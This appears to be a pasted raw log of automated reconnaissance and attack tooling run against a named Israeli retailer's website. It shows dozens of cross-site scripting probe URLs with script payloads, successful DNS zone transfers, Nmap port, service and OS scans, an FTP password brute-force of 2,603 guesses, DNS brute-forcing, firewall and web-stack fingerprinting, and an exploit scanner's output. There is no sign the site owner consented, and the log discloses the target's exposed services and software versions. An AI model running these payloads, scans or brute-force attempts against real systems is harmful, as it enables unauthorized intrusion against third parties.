  963. + /index.1.html/msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>: The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  964. + /index.1.html/msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>: The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  965. + /index.1.html/msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>: The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  966. + OSVDB-50539: /index.1.html/modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>: Basit cms 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  967. + /index.1.html/modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  968. + /index.1.html/modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  969. + /index.1.html/modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  970. + /index.1.html/modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  971. + OSVDB-3201: /index.1.html/megabook/admin.cgi?login=<script>alert('Vulnerable')</script>: Megabook guestbook is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  972. + /index.1.html/mailman/listinfo/<script>alert('Vulnerable')</script>: Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. http://www.cert.org/advisories/CA-2000-02.html.
  973. + OSVDB-5803: /index.1.html/isapi/testisa.dll?check1=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  974. + OSVDB-50552: /index.1.html/index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  975. + /index.1.html/index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
  976. + /index.1.html/index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  977. + OSVDB-50553: /index.1.html/index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  978. + OSVDB-50553: /index.1.html/index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  979. + /index.1.html/html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>: myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  980. + /index.1.html/html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>: myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  981. + /index.1.html/html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  982. + OSVDB-2322: /index.1.html/gallery/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  983. + OSVDB-31694: /index.1.html/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>: YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page. http://www.cert.org/advisories/CA-2000-02.html.
  984. + OSVDB-9231: /index.1.html/error/500error.jsp?et=1<script>alert('Vulnerable')</script>;: Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. http://www.cert.org/advisories/CA-2000-02.html.
  985. + OSVDB-50619: /index.1.html/cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>: RSA ClearTrust allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  986. + OSVDB-651: /index.1.html/cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  987. + OSVDB-651: /index.1.html/cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  988. + OSVDB-27095: /index.1.html/bb000001.pl<script>alert('Vulnerable')</script>: Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  989. + OSVDB-4765: /index.1.html/apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>: Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  990. + OSVDB-2243: /index.1.html/addressbook/index.php?surname=<script>alert('Vulnerable')</script>: Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  991. + OSVDB-2243: /index.1.html/addressbook/index.php?name=<script>alert('Vulnerable')</script>: Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  992. + OSVDB-54589: /index.1.html/a.jsp/<script>alert('Vulnerable')</script>: JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. http://www.cert.org/advisories/CA-2000-02.html.
  993. + OSVDB-38019: /index.1.html/?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  994. + /index.1.html/<script>alert('Vulnerable')</script>.thtml: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  995. + /index.1.html/<script>alert('Vulnerable')</script>.shtml: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  996. + /index.1.html/<script>alert('Vulnerable')</script>.jsp: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  997. + /index.1.html/<script>alert('Vulnerable')</script>.aspx: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html.
  998. ---------------------------------------------------------------------------------------------------------------------------------------
  999. #######################################################################################################################################
  1000. dnsenum VERSION:1.2.4
  1001.  
  1002. ----- babylon-woodline.co.il -----
  1003.  
  1004.  
  1005. Host's addresses:
  1006. __________________
  1007.  
  1008. babylon-woodline.co.il. 14004 IN A 62.90.134.182
  1009.  
  1010.  
  1011. Name Servers:
  1012. ______________
  1013.  
  1014. ns2.webid.co.il. 86003 IN A 212.150.246.99
  1015. ns1.webid.co.il. 13156 IN A 62.90.134.182
  1016.  
  1017.  
  1018. Mail (MX) Servers:
  1019. ___________________
  1020.  
  1021. mail.babylon-woodline.co.il. 14400 IN A 62.90.134.182
  1022.  
  1023.  
  1024. Trying Zone Transfers and getting Bind Versions:
  1025. _________________________________________________
  1026.  
  1027.  
  1028. Trying Zone Transfer for babylon-woodline.co.il on ns2.webid.co.il ...
  1029. babylon-woodline.co.il. 14400 IN SOA (
  1030. babylon-woodline.co.il. 14400 IN TXT "v=spf1
  1031. babylon-woodline.co.il. 14400 IN MX 10
  1032. babylon-woodline.co.il. 14400 IN NS ns1.webid.co.il.
  1033. babylon-woodline.co.il. 14400 IN NS ns2.webid.co.il.
  1034. babylon-woodline.co.il. 14400 IN A 62.90.134.182
  1035. _domainkey.babylon-woodline.co.il. 14400 IN TXT o=~
  1036. x._domainkey.babylon-woodline.co.il. 14400 IN TXT (
  1037. ftp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
  1038. mail.babylon-woodline.co.il. 14400 IN A 62.90.134.182
  1039. pop.babylon-woodline.co.il. 14400 IN A 62.90.134.182
  1040. smtp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
  1041. www.babylon-woodline.co.il. 14400 IN A 62.90.134.182
  1042.  
  1043. Trying Zone Transfer for babylon-woodline.co.il on ns1.webid.co.il ...
  1044. babylon-woodline.co.il. 14400 IN SOA (
  1045. babylon-woodline.co.il. 14400 IN TXT "v=spf1
  1046. babylon-woodline.co.il. 14400 IN MX 10
  1047. babylon-woodline.co.il. 14400 IN NS ns1.webid.co.il.
  1048. babylon-woodline.co.il. 14400 IN NS ns2.webid.co.il.
  1049. babylon-woodline.co.il. 14400 IN A 62.90.134.182
  1050. _domainkey.babylon-woodline.co.il. 14400 IN TXT o=~
  1051. x._domainkey.babylon-woodline.co.il. 14400 IN TXT (
  1052. ftp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
  1053. mail.babylon-woodline.co.il. 14400 IN A 62.90.134.182
  1054. pop.babylon-woodline.co.il. 14400 IN A 62.90.134.182
  1055. smtp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
  1056. www.babylon-woodline.co.il. 14400 IN A 62.90.134.182
  1057. brute force file not specified, bay.
  1058. #######################################################################################################################################
  1059. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
  1060. Nmap scan report for babylon-woodline.co.il (62.90.134.182)
  1061. Host is up (0.24s latency).
  1062. rDNS record for 62.90.134.182: server.webid.co.il
  1063. Not shown: 336 closed ports, 124 filtered ports
  1064. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1065. PORT STATE SERVICE
  1066. 21/tcp open ftp
  1067. 53/tcp open domain
  1068. 80/tcp open http
  1069. 110/tcp open pop3
  1070. 143/tcp open imap
  1071. 443/tcp open https
  1072. 465/tcp open smtps
  1073. 587/tcp open submission
  1074. 993/tcp open imaps
  1075. 995/tcp open pop3s
  1076. 2000/tcp open cisco-sccp
  1077. 2222/tcp open EtherNetIP-1
  1078. 3306/tcp open mysql
  1079. 5060/tcp open sip
  1080. 8080/tcp open http-proxy
  1081. 8081/tcp open blackice-icecap
  1082. #######################################################################################################################################
  1083. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
  1084. Nmap scan report for babylon-woodline.co.il (62.90.134.182)
  1085. Host is up (0.21s latency).
  1086. rDNS record for 62.90.134.182: server.webid.co.il
  1087. Not shown: 10 closed ports, 2 filtered ports
  1088. PORT STATE SERVICE
  1089. 53/udp open domain
  1090. #######################################################################################################################################
  1091. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
  1092. NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
  1093. NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
  1094. NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
  1095. Nmap scan report for babylon-woodline.co.il (62.90.134.182)
  1096. Host is up (0.23s latency).
  1097. rDNS record for 62.90.134.182: server.webid.co.il
  1098.  
  1099. PORT STATE SERVICE VERSION
  1100. 21/tcp open ftp ProFTPD
  1101. | ftp-brute:
  1102. | Accounts: No valid accounts found
  1103. |_ Statistics: Performed 2603 guesses in 180 seconds, average tps: 14.3
  1104. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1105. Device type: general purpose|firewall|storage-misc|VoIP phone
  1106. Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
  1107. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
  1108. Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
  1109. No exact OS matches for host (test conditions non-ideal).
  1110. Network Distance: 17 hops
  1111. Service Info: OS: Unix
  1112.  
  1113. TRACEROUTE (using port 21/tcp)
  1114. HOP RTT ADDRESS
  1115. 1 144.01 ms 10.246.200.1
  1116. 2 144.31 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
  1117. 3 171.32 ms 176.10.83.34
  1118. 4 144.07 ms sfia-b2-link.telia.net (62.115.148.144)
  1119. 5 176.24 ms 80.91.253.248
  1120. 6 177.65 ms ffm-bb3-link.telia.net (62.115.121.118)
  1121. 7 181.66 ms ffm-b1-link.telia.net (62.115.116.160)
  1122. 8 174.66 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
  1123. 9 ...
  1124. 10 229.13 ms gw2-hfa-0-2-0-2-200-gw2.fra.nv.net.il (212.143.12.13)
  1125. 11 242.53 ms 212.143.12.32
  1126. 12 245.84 ms core1-0-2-0-1-gw2.hfa.nv.net.il (212.143.7.24)
  1127. 13 243.38 ms po231.srvc3.rha.nv.net.il (212.143.201.190)
  1128. 14 236.75 ms 82.166.37.254
  1129. 15 234.25 ms 82.166.37.254
  1130. 16 235.36 ms 62-90-134-178.barak.net.il (62.90.134.178)
  1131. 17 233.88 ms server.webid.co.il (62.90.134.182)
  1132. #######################################################################################################################################
  1133. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:25 EST
  1134. Nmap scan report for babylon-woodline.co.il (62.90.134.182)
  1135. Host is up (0.23s latency).
  1136. rDNS record for 62.90.134.182: server.webid.co.il
  1137.  
  1138. PORT STATE SERVICE VERSION
  1139. 53/tcp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
  1140. |_dns-fuzz: Server didn't response to our probe, can't fuzz
  1141. | dns-nsec-enum:
  1142. |_ No NSEC records found
  1143. | dns-nsec3-enum:
  1144. |_ DNSSEC NSEC3 not supported
  1145. | dns-nsid:
  1146. |_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
  1147. |_dns-zone-transfer: ERROR: Script execution failed (use -d to debug)
  1148. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1149. Device type: general purpose|storage-misc|firewall|VoIP phone
  1150. Running (JUST GUESSING): Linux 2.6.X|3.X (91%), Synology DiskStation Manager 5.X (90%), WatchGuard Fireware 11.X (89%), Grandstream embedded (85%)
  1151. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8 cpe:/h:grandstream:gxv3275
  1152. Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 3.4 (89%), WatchGuard Fireware 11.8 (89%), Linux 3.10 (88%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
  1153. No exact OS matches for host (test conditions non-ideal).
  1154. Network Distance: 16 hops
  1155. Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
  1156.  
  1157. Host script results:
  1158. | dns-blacklist:
  1159. | SPAM
  1160. |_ l2.apews.org - SPAM
  1161. | dns-brute:
  1162. | DNS Brute-force hostnames:
  1163. | host.co.il - 148.251.90.173
  1164. | development.co.il - 144.76.61.240
  1165. | http.co.il - 212.150.243.210
  1166. | svn.co.il - 159.65.118.35
  1167. | ads.co.il - 176.31.218.147
  1168. | mysql.co.il - 216.239.32.21
  1169. | mysql.co.il - 216.239.34.21
  1170. | mysql.co.il - 216.239.36.21
  1171. | mysql.co.il - 216.239.38.21
  1172. | images.co.il - 162.219.30.82
  1173. | news.co.il - 188.166.109.104
  1174. | adserver.co.il - 195.128.177.33
  1175. | info.co.il - 104.31.92.2
  1176. | info.co.il - 104.31.93.2
  1177. | test.co.il - 127.0.0.1
  1178. | noc.co.il - 96.31.35.145
  1179. | info.co.il - 2606:4700:30::681f:5c02
  1180. | info.co.il - 2606:4700:30::681f:5d02
  1181. | internal.co.il - 185.18.205.241
  1182. | test1.co.il - 185.56.75.60
  1183. | alpha.co.il - 34.243.190.172
  1184. | alpha.co.il - 52.19.144.59
  1185. | dns.co.il - 82.80.253.15
  1186. | internet.co.il - 95.175.32.10
  1187. | ns1.co.il - 178.32.55.171
  1188. | intra.co.il - 62.219.78.222
  1189. | test2.co.il - 209.88.192.216
  1190. | ns2.co.il - 92.222.209.88
  1191. | intranet.co.il - 194.90.1.109
  1192. | testing.co.il - 192.117.125.106
  1193. | download.co.il - 148.251.90.173
  1194. | app.co.il - 34.242.176.33
  1195. | upload.co.il - 192.185.139.151
  1196. | ntp.co.il - 107.154.156.178
  1197. | ntp.co.il - 107.154.163.178
  1198. | apps.co.il - 176.31.218.147
  1199. | erp.co.il - 69.163.219.179
  1200. | vnc.co.il - 194.90.1.109
  1201. | ops.co.il - 108.167.133.37
  1202. | voip.co.il - 212.179.240.8
  1203. | auth.co.il - 146.148.67.190
  1204. | owa.co.il - 212.29.214.195
  1205. | exchange.co.il - 181.215.116.38
  1206. | linux.co.il - 81.218.80.235
  1207. | pbx.co.il - 185.18.204.26
  1208. | beta.co.il - 176.31.218.147
  1209. | local.co.il - 80.244.174.35
  1210. | secure.co.il - 62.219.17.162
  1211. | blog.co.il - 212.143.60.51
  1212. | log.co.il - 62.219.84.197
  1213. | server.co.il - 148.251.90.173
  1214. | shop.co.il - 188.166.109.104
  1215. | sip.co.il - 213.8.172.5
  1216. | manage.co.il - 212.199.211.142
  1217. | mobile.co.il - 162.144.16.99
  1218. | monitor.co.il - 194.90.1.109
  1219. | mta.co.il - 212.199.167.22
  1220. | web.co.il - 192.115.21.75
  1221. | whois.co.il - 109.74.198.188
  1222. | www2.co.il - 64.90.49.227
  1223. | sql.co.il - 192.254.237.210
  1224. | ssh.co.il - 81.218.229.185
  1225. | firewall.co.il - 62.219.67.17
  1226. | ssl.co.il - 82.80.253.21
  1227. | forum.co.il - 62.219.11.147
  1228. | stage.co.il - 52.58.94.54
  1229. | chat.co.il - 95.175.47.103
  1230. | ftp.co.il - 198.23.57.32
  1231. | citrix.co.il - 165.160.13.20
  1232. | citrix.co.il - 165.160.15.20
  1233. | cms.co.il - 194.90.203.76
  1234. | corp.co.il - 204.93.178.102
  1235. | git.co.il - 81.218.229.200
  1236. | crs.co.il - 136.243.93.246
  1237. | cvs.co.il - 194.90.8.80
  1238. | help.co.il - 138.201.204.221
  1239. | home.co.il - 35.173.175.98
  1240. | demo.co.il - 212.235.14.43
  1241. |_ dev.co.il - 80.179.11.157
  1242.  
  1243. TRACEROUTE (using port 53/tcp)
  1244. HOP RTT ADDRESS
  1245. 1 143.53 ms 10.246.200.1
  1246. 2 143.88 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
  1247. 3 153.87 ms 176.10.83.34
  1248. 4 143.59 ms sfia-b2-link.telia.net (62.115.148.144)
  1249. 5 177.61 ms 213.155.133.212
  1250. 6 175.83 ms ffm-bb3-link.telia.net (62.115.121.118)
  1251. 7 209.91 ms ffm-b1-link.telia.net (62.115.121.5)
  1252. 8 176.67 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
  1253. 9 ...
  1254. 10 228.81 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
  1255. 11 229.37 ms 212.143.7.102
  1256. 12 229.75 ms core2-rha-2-0-0-core2-hfa-5-0-7.nv.net.il (212.143.12.119)
  1257. 13 230.26 ms core1-rha-1-0-0-core1-hfa-5-0-7.nv.net.il (212.143.12.117)
  1258. 14 235.22 ms 212.143.201.190
  1259. 15 235.61 ms 62-90-134-178.barak.net.il (62.90.134.178)
  1260. 16 235.60 ms server.webid.co.il (62.90.134.182)
  1261. #######################################################################################################################################
  1262.  
  1263. ^ ^
  1264. _ __ _ ____ _ __ _ _ ____
  1265. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1266. | V V // o // _/ | V V // 0 // 0 // _/
  1267. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1268. <
  1269. ...'
  1270.  
  1271. WAFW00F - Web Application Firewall Detection Tool
  1272.  
  1273. By Sandro Gauci && Wendel G. Henrique
  1274.  
  1275. Checking http://babylon-woodline.co.il
  1276. The site http://babylon-woodline.co.il is behind a ModSecurity (OWASP CRS)
  1277. Number of requests: 13
  1278. #######################################################################################################################################
  1279. http://babylon-woodline.co.il [301 Moved Permanently] Country[ISRAEL][IL], HTTPServer[nginx], IP[62.90.134.182], RedirectLocation[/index.1.html], nginx
  1280. http://babylon-woodline.co.il/index.1.html [200 OK] Country[ISRAEL][IL], HTML5, HTTPServer[nginx], IP[62.90.134.182], JQuery, Meta-Author[ישראל ממליץ], Open-Graph-Protocol, Script[text/javascript], Title[מזרונים ליין], nginx
  1281. #######################################################################################################################################
  1282. wig - WebApp Information Gatherer
  1283.  
  1284.  
  1285. Scanning http://babylon-woodline.co.il...
  1286. _________________________________________ SITE INFO __________________________________________
  1287. IP Title
  1288. 62.90.134.182 מזרונים ליין
  1289.  
  1290. __________________________________________ VERSION ___________________________________________
  1291. Name Versions Type
  1292. Roundcube CMS
  1293. phpMyAdmin CMS
  1294. Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.5 | 2.4.6 | 2.4.7 | 2.4.8 Platform
  1295. 2.4.9
  1296. nginx Platform
  1297.  
  1298. ______________________________________________________________________________________________
  1299. Time: 111.5 sec Urls: 472 Fingerprints: 40401
  1300. #######################################################################################################################################
  1301. HTTP/1.1 301 Moved Permanently
  1302. Server: nginx
  1303. Date: Wed, 23 Jan 2019 09:30:32 GMT
  1304. Content-Type: text/html; charset=utf-8
  1305. Connection: keep-alive
  1306. Location: /index.1.html
  1307. Vary: User-Agent
  1308. #######################################################################################################################################
  1309. ---------------------------------------------------------------------------------------------------------------------------------------
  1310.  
  1311. [ ! ] Starting SCANNER INURLBR 2.1 at [23-01-2019 04:30:53]
  1312. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  1313. It is the end user's responsibility to obey all applicable local, state and federal laws.
  1314. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1315.  
  1316. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-babylon-woodline.co.il ]
  1317. [ INFO ][ DORK ]::[ site:babylon-woodline.co.il ]
  1318. [ INFO ][ SEARCHING ]:: {
  1319. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.tr ]
  1320.  
  1321. [ INFO ][ SEARCHING ]::
  1322. -[:::]
  1323. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  1324.  
  1325. [ INFO ][ SEARCHING ]::
  1326. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1327. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.mt ID: 012873187529719969291:yexdhbzntue ]
  1328.  
  1329. [ INFO ][ SEARCHING ]::
  1330. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1331.  
  1332. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
  1333.  
  1334.  
  1335. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1336. |_[ + ] [ 0 / 100 ]-[04:31:14] [ - ]
  1337. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרון-באיתנים ]
  1338. |_[ + ] Exploit::
  1339. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1340. |_[ + ] More details:: / - / , ISP:
  1341. |_[ + ] Found:: UNIDENTIFIED
  1342.  
  1343. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1344. |_[ + ] [ 1 / 100 ]-[04:31:16] [ - ]
  1345. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-במבצע-באלראם ]
  1346. |_[ + ] Exploit::
  1347. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1348. |_[ + ] More details:: / - / , ISP:
  1349. |_[ + ] Found:: UNIDENTIFIED
  1350.  
  1351. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1352. |_[ + ] [ 2 / 100 ]-[04:31:18] [ - ]
  1353. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרנים-זולים-כרמיה ]
  1354. |_[ + ] Exploit::
  1355. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1356. |_[ + ] More details:: / - / , ISP:
  1357. |_[ + ] Found:: UNIDENTIFIED
  1358.  
  1359. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1360. |_[ + ] [ 3 / 100 ]-[04:31:20] [ - ]
  1361. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-קטנים-ביובל ]
  1362. |_[ + ] Exploit::
  1363. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1364. |_[ + ] More details:: / - / , ISP:
  1365. |_[ + ] Found:: UNIDENTIFIED
  1366.  
  1367. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1368. |_[ + ] [ 4 / 100 ]-[04:31:23] [ - ]
  1369. |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-בפת ]
  1370. |_[ + ] Exploit::
  1371. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1372. |_[ + ] More details:: / - / , ISP:
  1373. |_[ + ] Found:: UNIDENTIFIED
  1374.  
  1375. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1376. |_[ + ] [ 5 / 100 ]-[04:31:25] [ - ]
  1377. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרנים-בזול-אריאל ]
  1378. |_[ + ] Exploit::
  1379. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1380. |_[ + ] More details:: / - / , ISP:
  1381. |_[ + ] Found:: UNIDENTIFIED
  1382.  
  1383. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1384. |_[ + ] [ 6 / 100 ]-[04:31:27] [ - ]
  1385. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-רשפון ]
  1386. |_[ + ] Exploit::
  1387. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1388. |_[ + ] More details:: / - / , ISP:
  1389. |_[ + ] Found:: UNIDENTIFIED
  1390.  
  1391. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1392. |_[ + ] [ 7 / 100 ]-[04:31:29] [ - ]
  1393. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-נוחים-בשמעה ]
  1394. |_[ + ] Exploit::
  1395. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1396. |_[ + ] More details:: / - / , ISP:
  1397. |_[ + ] Found:: UNIDENTIFIED
  1398.  
  1399. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1400. |_[ + ] [ 8 / 100 ]-[04:31:32] [ - ]
  1401. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-גבוהים-ביכיני ]
  1402. |_[ + ] Exploit::
  1403. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1404. |_[ + ] More details:: / - / , ISP:
  1405. |_[ + ] Found:: UNIDENTIFIED
  1406.  
  1407. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1408. |_[ + ] [ 9 / 100 ]-[04:31:34] [ - ]
  1409. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרון-בזול-שבלי ]
  1410. |_[ + ] Exploit::
  1411. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1412. |_[ + ] More details:: / - / , ISP:
  1413. |_[ + ] Found:: UNIDENTIFIED
  1414.  
  1415. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1416. |_[ + ] [ 10 / 100 ]-[04:31:36] [ - ]
  1417. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-בנשר ]
  1418. |_[ + ] Exploit::
  1419. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1420. |_[ + ] More details:: / - / , ISP:
  1421. |_[ + ] Found:: UNIDENTIFIED
  1422.  
  1423. _[ - ]::--------------------------------------------------------------------------------------------------------------
